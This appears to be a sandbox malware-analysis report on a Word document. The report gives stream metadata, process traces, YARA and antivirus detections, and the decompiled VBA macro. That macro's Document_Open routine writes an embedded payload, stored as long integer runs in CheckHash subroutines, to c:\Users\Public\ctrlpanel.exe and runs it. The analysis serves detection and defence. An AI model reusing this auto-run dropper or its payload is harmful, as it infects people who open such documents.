                            Y = 7761670
                            Y = 2003765760
                            Y = 101318656
                            Y = 30319
                            Y = 7892746
                            Y = 541002240
                            Y = 301989887
                            Y = 1026627332
                            Y = 70021640
                            Y = 68251648
                            Y = 29992
                            Y = 71594506
                            Y = 774402048
                            Y = 201981952
                            Y = 71987720
                            Y = 671707136
                            Y = 167772277
                            Y = 279666
                            Y = 3025008
                            Y = 135006720
                            Y = 282738
                            Y = 1255536
                            Y = 722209280
                            Y = 1248987159
                            Y = 158334980
                            Y = 29992
                            Y = 71594506
                            Y = 774402048
                            Y = 201981952
                            Y = 73298440
                            Y = 321417216
                            Y = 201981952
                            Y = 77492744
                            Y = 321417216
                            Y = 201981952
                            Y = 81424904
                            Y = 321417216
                            Y = 201981952
                            Y = 83915272
                            Y = 321417216
                            Y = 201981952
                            Y = 91255304
                            Y = 321417216
                            Y = 201981952
                            Y = 94138888
                            Y = 321417216
                            Y = 201981952
                            Y = 99512840
                            Y = 321417216
                            Y = 201981952
                            Y = 386208022
                            Y = 319296345
                            Y = 136194823
                            Y = 398450
                            Y = 671551856
                            Y = 167772277
                            Y = 406130
                            Y = 3025008
                            Y = 286001664
                            Y = 324540167
                            Y = 285675783
                            Y = 148648200
                            Y = 408690
                            Y = 1255536
                            Y = 135006720
                            Y = 414322
                            Y = 1255536
                            Y = 135006720
                            Y = 418930
                            Y = 1255536
                            Y = 135006720
                            Y = 428146
                            Y = 1255536
                            Y = 135006720
                            Y = 286322
                            Y = 1255536
                            Y = 34343424
                            Y = 949512
                            Y = 705168384
                            Y = 1112167234
                            Y = 65537
                            Y = 0
                            Y = 12
                            Y = 808333942
                            Y = 925906222
                            Y = 14130
                            Y = 327680
                            Y = 108
                            Y = 2352
                            Y = 32291
                            Y = 2460
                            Y = 3200
                            Y = 1920226083
                            Y = 1936158313
                            Y = 0
                            Y = 5660
                            Y = 1684
                            Y = 5461283
                            Y = 7344
                            Y = 16
                            Y = 1230325539
                            Y = 68
                            Y = 7360
                            Y = 1108
                            Y = 1869365795
                            Y = 98
                            Y = 0
                            Y = 16777218
                            Y = 161619287
                            Y = 9
                            Y = 858126848
                            Y = 5632
                            Y = 1
                            Y = 81
                            Y = 5
                            Y = 18
                            Y = 24
                            Y = 16
                            Y = 132
                            Y = 2
                            Y = 17
                            Y = 20
                            For I = 1 To 2
                            Y = 2
                            Next
                            Y = 4
                            Y = 2
                            Y = 1
                            Y = 7
                            Y = 208601088
                            Y = 1
                            Y = 393216
                            Y = 5570652
                            Y = 20250630
                            Y = 393508
                            Y = 19136860
                            Y = 29294606
                            Y = 917929
                            Y = 27853344
                            Y = 40828946
                            Y = 393809
                            Y = 45482705
                            Y = 50135046
                            Y = 655445
                            Y = 51643195
                            Y = 57212934
                            Y = 393508
                            Y = 58327946
                            Y = 60555270
                            Y = 1442084
                            Y = 61473391
                            Y = 63307786
                            Y = 394004
                            Y = 5571550
                            Y = 66125830
                            Y = 655445
                            Y = 1246211
                            Y = 68878346
                            Y = 394004
                            Y = 70714435
                            Y = 74055686
                            Y = 655445
                            Y = 1246337
                            Y = 78774278
                            Y = 394408
                            Y = 78120125
                            Y = 80084998
                            Y = 394408
                            Y = 5571793
                            Y = 81461254
                            Y = 918696
                            Y = 27854056
                            Y = 86900742
                            Y = 394408
                            Y = 78120270
                            Y = 90570758
                            Y = 394408
                            Y = 78120326
                            Y = 94502918
                            Y = 394408
                            Y = 78120364
                            Y = 96600070
                            Y = 394408
                            Y = 78120435
                            Y = 100597770
                            Y = 655379
                            Y = 1246731
                            Y = 102563846
                            Y = 394408
                            Y = 104466010
                            Y = 108724230
                            Y = 1179733
                            Y = 38864513
                            Y = 109969426
                            Y = 393809
                            Y = 5572262
                            Y = 113246214
                            Y = 1181358
                            Y = 38864595
                            Y = 119996442
                            Y = 1705745
                            Y = 118556500
                            Y = 126222342
                            Y = 394408
                            Y = 5572495
                            Y = 127402002
                            Y = 1966673
                            Y = 127993783
                            Y = 130154526
                            Y = 395169
                            Y = 5572558
                            Y = 131530783
                            Y = 655360
                            Y = 140052598
                            Y = 145227794
                            Y = 1966673
                            Y = 127994057
                            Y = 148963358
                            Y = 1968033
                            Y = 127994092
                            Y = 151650334
                            Y = 1968033
                            Y = 127994141
                            Y = 154730526
                            Y = 395169
                            Y = 45484531
                            Y = 168427538
                            Y = 1180241
                            Y = 38865456
                            Y = 175767562
                            Y = 394004
                            Y = 5573279
                            Y = 180027398
                            Y = 394408
                            Y = 184617748
                            Y = 187171095
                            Y = 393216
                            Y = 104467255
                            Y = 190251014
                            Y = 394810
                            Y = 112069493
                            Y = 196149254
                            Y = 396178
                            Y = 194120639
                            Y = 198377478
                            Y = 394926
                            Y = 112069614
                            Y = 201916422
                            Y = 394926
                            Y = 112069666
                            Y = 205193222
                            Y = 394926
                            Y = 112069720
                            Y = 0
                            Y = 1
                            Y = 65536
                            Y = 16777217
                            Y = 2686992
                            Y = 327729
                            Y = 65537
                            Y = 1048832
                            Y = 3211323
                            Y = 327685
                            Y = 65544
                            Y = 4194304
                            Y = 327729
                            Y = 786443
                            Y = 1
                            Y = 3211340
                            Y = 786437
                            Y = 1441809
                            Y = 1507434
                            Y = 7798806
                            Y = 1441815
                            Y = 1507459
                            Y = 8912918
                            Y = -2142175209
                            Y = 1507610
                            Y = 20643857
                            Y = 1114195
                            Y = 5439818
                            Y = 4980753
                            Y = 1114199
                            Y = 5963840
                            Y = 23199761
                            Y = 65631
                            Y = 7078352
                            Y = 41615361
                            Y = -2142175088
                            Y = 9699967
                            Y = 42926081
                            Y = 65559
                            Y = 7078352
                            Y = 44367873
                            Y = 65696
                            Y = 9700011
                            Y = 47710209
                            Y = 567017636
                            Y = 0
                            Y = 6494225
                            Y = 65555
                            Y = 8696
                            Y = 1441792
                            Y = 1704081
                            Y = 576192513
                            Y = 0
                            Y = 11141142
                            Y = 131103
                            Y = 8856
                            Y = 1441792
                            Y = 2490565
                            Y = 584843267
                            Y = 0
                            Y = 14221334
                            Y = 262170
                            Y = 8984
                            Y = 1441792
                            Y = 1704168
                            Y = 591921157
                            Y = 0
                            Y = 16318486
                            Y = 393260
                            Y = 8272
                            Y = 403767296
                            Y = 1245283
                            Y = 543948808
                            Y = 0
                            Y = 3866646
                            Y = 524307
                            Y = 8508
                            Y = 1114112
                            Y = 6488426
                            Y = 562298888
                            Y = 0
                            Y = 25690129
                            Y = 589923
                            Y = 9124
                            Y = 403046400
                            Y = 6816163
                            Y = 599261194
                            Y = 0
                            Y = 31591233
                            Y = 655472
                            Y = 9164
                            Y = 188809248
                            Y = 7668215
                            Y = 605552650
                            Y = 0
                            Y = 35389446
                            Y = 721000
                            Y = 9312
                            Y = 65536
                            Y = 8061488
                            Y = 640942091
                            Y = 0
                            Y = 27465734
                            Y = 852072
                            Y = 9828
                            Y = 188809216
                            Y = 7340514
                            Y = 645398541
                            Y = 2097152
                            Y = 32967489
                            Y = 852085
                            Y = 9924
                            Y = 393216
                            Y = 6816284
                            Y = 670564366
                            Y = 0
                            Y = 43843585
                            Y = 917660
                            Y = 10296
                            Y = 65536
                            Y = 8061488
                            Y = 770965518
                            Y = 0
                            Y = 48168961
                            Y = 1048747
                            Y = 11892
                            Y = 65536
                            Y = 11535092
                            Y = 17
                            Y = 10878977
                            Y = 65536
                            Y = 191
                            Y = 12517377
                            Y = 655

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.897252843148012
                            Base64 Encoded:False
                            Data ASCII:. . . . . . L u d @ K g 2 . . . . . . M i c r o s o f t O f f i c e W o r d . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 9b 4c 75 f4 f5 64 40 4b 8a f4 67 97 32 ac 06 07 1f 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 11 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.2859012360872883
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 84 00 00 00 06 00 00 00 8c 00 00 00 11 00 00 00 94 00 00 00 17 00 00 00 9c 00 00 00 0b 00 00 00 a4 00 00 00 10 00 00 00 ac 00 00 00 13 00 00 00 b4 00 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.46067653843144757
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . . . . . . . . . . W o r k .
                            Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 07 00 00 00 c8 00 00 00 08 00 00 00 d8 00 00 00 09 00 00 00 e8 00 00 00 12 00 00 00 f4 00 00 00
                            General
                            Stream Path:1Table
                            CLSID:
                            File Type:data
                            Stream Size:10154
                            Entropy:5.949814296997679
                            Base64 Encoded:True
                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                            Data Raw:6a 04 12 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                            General
                            Stream Path:Data
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:Macros/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:367
                            Entropy:5.242931201937387
                            Base64 Encoded:True
                            Data ASCII:I D = " { 9 2 C 2 E F 4 C - A 9 1 4 - 4 D 6 0 - 8 1 D 4 - D 0 7 2 A 0 E 5 2 A 3 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 4 0 6 C E D D D 6 E E D A E E D A E E D A E E D A " . . D P B = " 1 1 1 3 D B D C D C D C D C D C " . . G C = " 1 E 1 C D 4 E B E C F 5 F 8 F 6 F 8 F 6 0 7 " . . . . [ H o s t E x t e n d e r I n f o ]
                            Data Raw:49 44 3d 22 7b 39 32 43 32 45 46 34 43 2d 41 39 31 34 2d 34 44 36 30 2d 38 31 44 34 2d 44 30 37 32 41 30 45 35 32 41 33 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                            General
                            Stream Path:Macros/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:41
                            Entropy:3.0773844850752607
                            Base64 Encoded:False
                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                            General
                            Stream Path:Macros/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2677
                            Entropy:4.236163081741064
                            Base64 Encoded:False
                            Data ASCII:a . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 97 00 00 01 00 ff 22 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                            General
                            Stream Path:Macros/VBA/dir
                            CLSID:
                            File Type:PDP-11 UNIX/RT ldp
                            Stream Size:517
                            Entropy:6.255251693845562
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . W 0 h . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ s y s t e m . 3 2 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . E N o r m a . l E N C r . m . a F . . . . . . * \\ C . . . . Z w $ . h . . ! O f f i " c g O . f . i .
                            Data Raw:01 01 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 7f 57 30 68 b1 ae 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30
                            General
                            Stream Path:WordDocument
                            CLSID:
                            File Type:data
                            Stream Size:16948
                            Entropy:4.578534077302131
                            Base64 Encoded:False
                            Data ASCII:. . " . . . . . . . . . . . . . . . . . . . ; . . . . b j b j * . * . . . . . . . . . . . . . . . . . . . . . . . 4 B . . H | . . H | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . . . . . . . # . . . . . . . . . .
                            Data Raw:ec a5 c1 00 07 80 22 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 e2 3b 00 00 0e 00 62 6a 62 6a 2a 16 2a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 34 42 00 00 48 7c 00 00 48 7c 00 00 ec 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 9, 2024 01:48:23.579442024 CEST1.1.1.1192.168.2.40x90c2No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:01:48:04
                            Start date:09/05/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x490000
                            File size:1'620'872 bytes
                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:01:48:13
                            Start date:09/05/2024
                            Path:C:\Users\Public\ctrlpanel.exe
                            Wow64 process (32bit):false
                            Commandline:c:\Users\Public\ctrlpanel.exe
                            Imagebase:0x490000
                            File size:35'328 bytes
                            MD5 hash:40D2CCD570BD898CC31AF1CBFE5FB08E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Dynamer, Description: Yara detected Dynamer, Source: 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Dynamer, Description: Yara detected Dynamer, Source: 00000005.00000002.4054412499.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Dynamer, Description: Yara detected Dynamer, Source: C:\Users\Public\ctrlpanel.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 65%, ReversingLabs
                            Reputation:moderate
                            Has exited:false

                            Target ID:6
                            Start time:01:48:14
                            Start date:09/05/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x490000
                            File size:1'620'872 bytes
                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            Target ID:9
                            Start time:01:48:27
                            Start date:09/05/2024
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            Imagebase:0x7ff7e4480000
                            File size:71'680 bytes
                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Call Graph

                            • Entrypoint
                            • Decryption Function
                            • Executed
                            • Not Executed
                            • Show Help
                            callgraph 9 FE 24 Let Y 31 CheckHash 2688 CheckHash0 5783 CheckHash1 8858 CheckHash2 11180 CheckHash3 14095 CheckHash4 16633 CheckHash5 19151 CheckHash6 21951 CheckHash7 23466 Document_Open Shell:1 23466->9 23466->31 23466->2688 23466->5783 23466->8858 23466->11180 23466->14095 23466->16633 23466->19151 23466->21951

                            Module: ThisDocument

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisDocument"

                            2

                            Attribute VB_Base = "1Normal.ThisDocument"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = True

                            8

                            Attribute VB_Customizable = True

                            APIsMeta Information

                            Open

                            Part of subcall function FE@ThisDocument: FileLen

                            Open

                            Open("c:\Users\Public\ctrlpanel.exe")

                            Shell

                            Shell("c:\Users\Public\ctrlpanel.exe") -> 7472
                            StringsDecrypted Strings
                            "c:\Users\Public\ctrlpanel.exe"
                            LineInstructionMeta Information
                            7360

                            Private Sub Document_Open()

                            7361

                            On Error Goto L_

                            executed
                            7362

                            Dim ShS as String

                            7362

                            ShS = "c:\Users\Public\ctrlpanel.exe"

                            7363

                            If Not FE(ShS) Then

                            Open

                            7364

                            Open ShS For Binary Access Write As # 1

                            Open("c:\Users\Public\ctrlpanel.exe")

                            executed
                            7365

                            Call CheckHash()

                            7366

                            Call CheckHash0()

                            7367

                            Call CheckHash1()

                            7368

                            Call CheckHash2()

                            7369

                            Call CheckHash3()

                            7370

                            Call CheckHash4()

                            7371

                            Call CheckHash5()

                            7372

                            Call CheckHash6()

                            7373

                            Call CheckHash7()

                            7374

                            Close # 1

                            7375

                            Endif

                            7376

                            Call Shell(ShS)

                            Shell("c:\Users\Public\ctrlpanel.exe") -> 7472

                            executed
                            7376

                            L_:

                            7378

                            End Sub

                            APIsMeta Information

                            FileLen

                            LineInstructionMeta Information
                            9

                            Private Function FE(V as String) as Boolean

                            10

                            On Error Resume Next

                            executed
                            10

                            FE = (FileLen(V) > - 1)

                            FileLen

                            11

                            End Function

                            LineInstructionMeta Information
                            903

                            Private Sub CheckHash0()

                            904

                            Y = 290466826

                            executed
                            905

                            Y = 2649873

                            906

                            Y = 857213440

                            907

                            Y = 286200094

                            908

                            Y = 2715409

                            909

                            Y = 711920128

                            910

                            Y = 2114584576

                            911

                            Y = 67108867

                            912

                            Y = 2828311

                            913

                            Y = 1651444224

                            914

                            Y = 285868032

                            915

                            Y = 2649873

                            916

                            Y = 857278976

                            917

                            Y = 286200094

                            918

                            Y = 2715409

                            919

                            Y = 711920128

                            920

                            Y = 2114584576

                            921

                            Y = 67108867

                            922

                            Y = 2828310

                            923

                            Y = 1651444224

                            924

                            Y = - 569769984

                            925

                            Y = 36185359

                            926

                            Y = 319422464

                            927

                            Y = 206866

                            928

                            Y = 14551552

                            929

                            Y = 1477914385

                            930

                            Y = 789655315

                            931

                            Y = - 1215418351

                            932

                            Y = 35094834

                            933

                            Y = 3195

                            934

                            Y = 6516484

                            935

                            Y = 1684998656

                            936

                            Y = 319422464

                            937

                            Y = 722670385

                            938

                            Y = 34541888

                            939

                            Y = 3195

                            940

                            Y = 6516484

                            941

                            Y = 319883776

                            942

                            Y = 25967

                            943

                            Y = 6713098

                            944

                            Y = 58591744

                            945

                            Y = 369360896

                            946

                            Y = 11048

                            947

                            Y = 6450954

                            948

                            Y = 266209792

                            949

                            Y = 141349

                            950

                            Y = 336792064

                            951

                            Y = 808

                            952

                            Y = 285269514

                            953

                            Y = 324540179

                            954

                            Y = 286462227

                            955

                            Y = 1941582129

                            956

                            Y = 167772211

                            957

                            Y = 252776467

                            958

                            Y = 26479

                            959

                            Y = 724701962

                            960

                            Y = 674370092

                            961

                            Y = 167772264

                            962

                            Y = 353441043

                            963

                            Y = 26920

                            964

                            Y = 6957066

                            965

                            Y = - 1972237824

                            966

                            Y = 376438786

                            967

                            Y = 27432

                            968

                            Y = 154342922

                            969

                            Y = 353439761

                            970

                            Y = 27759

                            971

                            Y = 674370058

                            972

                            Y = 167772269

                            973

                            Y = 249482029

                            974

                            Y = 385757714

                            975

                            Y = 452984834

                            976

                            Y = 28271

                            977

                            Y = 285400074

                            978

                            Y = 7302928

                            979

                            Y = 276630016

                            980

                            Y = 704905216

                            981

                            Y = 50241

                            982

                            Y = 0

                            983

                            Y = 636

                            984

                            Y = 117

                            985

                            Y = 753

                            986

                            Y = 15

                            987

                            Y = 16777224

                            988

                            Y = 0

                            989

                            Y = 408

                            990

                            Y = 360

                            991

                            Y = 768

                            992

                            Y = 15

                            993

                            Y = 16777224

                            994

                            Y = 0

                            995

                            Y = 783

                            996

                            Y = 8

                            997

                            Y = 791

                            998

                            Y = 15

                            999

                            Y = 16777224

                            1000

                            Y = 0

                            1001

                            Y = 806

                            1002

                            Y = 37

                            1003

                            Y = 843

                            1004

                            Y = 15

                            1005

                            Y = 16777224

                            1006

                            Y = 0

                            1007

                            Y = 30

                            1008

                            Y = 837

                            1009

                            Y = 867

                            1010

                            Y = 15

                            1011

                            Y = 16777224

                            1012

                            Y = 0

                            1013

                            Y = 946

                            1014

                            Y = 91

                            1015

                            Y = 1037

                            1016

                            Y = 15

                            1017

                            Y = 16777224

                            1018

                            Y = 0

                            1019

                            Y = 1089

                            1020

                            Y = 43

                            1021

                            Y = 1132

                            1022

                            Y = 15

                            1023

                            Y = 16777224

                            1024

                            Y = 2

                            1025

                            Y = 1166

                            1026

                            Y = 66

                            1027

                            Y = 1232

                            1028

                            Y = 14

                            1029

                            Y = 0

                            1030

                            Y = 274451

                            1031

                            Y = 116

                            1032

                            Y = 285212691

                            1033

                            Y = 209388055

                            1034

                            Y = 1862533120

                            1035

                            Y = 167772259

                            1036

                            Y = 25711

                            1037

                            Y = 722078474

                            1038

                            Y = 209388122

                            1039

                            Y = 1862533120

                            1040

                            Y = 167772259

                            1041

                            Y = 6647558

                            1042

                            Y = 1718553088

                            1043

                            Y = 1913257984

                            1044

                            Y = 1879048746

                            1045

                            Y = 817922

                            1046

                            Y = 1668219904

                            1047

                            Y = 101318656

                            1048

                            Y = 25967

                            1049

                            Y = 7368458

                            1050

                            Y = 1227360768

                            1051

                            Y = 50987008

                            1052

                            Y = 7022614

                            1053

                            Y = 857082368

                            1054

                            Y = 209388054

                            1055

                            Y = 1862533120

                            1056

                            Y = 167772259

                            1057

                            Y = 6647558

                            1058

                            Y = 1903102464

                            1059

                            Y = 101318656

                            1060

                            Y = 101341207

                            1061

                            Y = 715272455

                            1062

                            Y = 274451

                            1063

                            Y = 664

                            1064

                            Y = 285212692

                            1065

                            Y = 948994

                            1066

                            Y = - 529398784

                            1067

                            Y = 376438785

                            1068

                            Y = 27432

                            1069

                            Y = 120460810

                            1070

                            Y = 948994

                            1071

                            Y = 1915356160

                            1072

                            Y = 1879048672

                            1073

                            Y = - 1804466164

                            1074

                            Y = 678428674

                            1075

                            Y = 167772179

                            1076

                            Y = - 260962292

                            1077

                            Y = 678428674

                            1078

                            Y = 167772179

                            1079

                            Y = 1282541580

                            1080

                            Y = 678428675

                            1081

                            Y = 167772179

                            1082

                            Y = 1785858060

                            1083

                            Y = 678428675

                            1084

                            Y = 167772179

                            1085

                            Y = - 1166931956

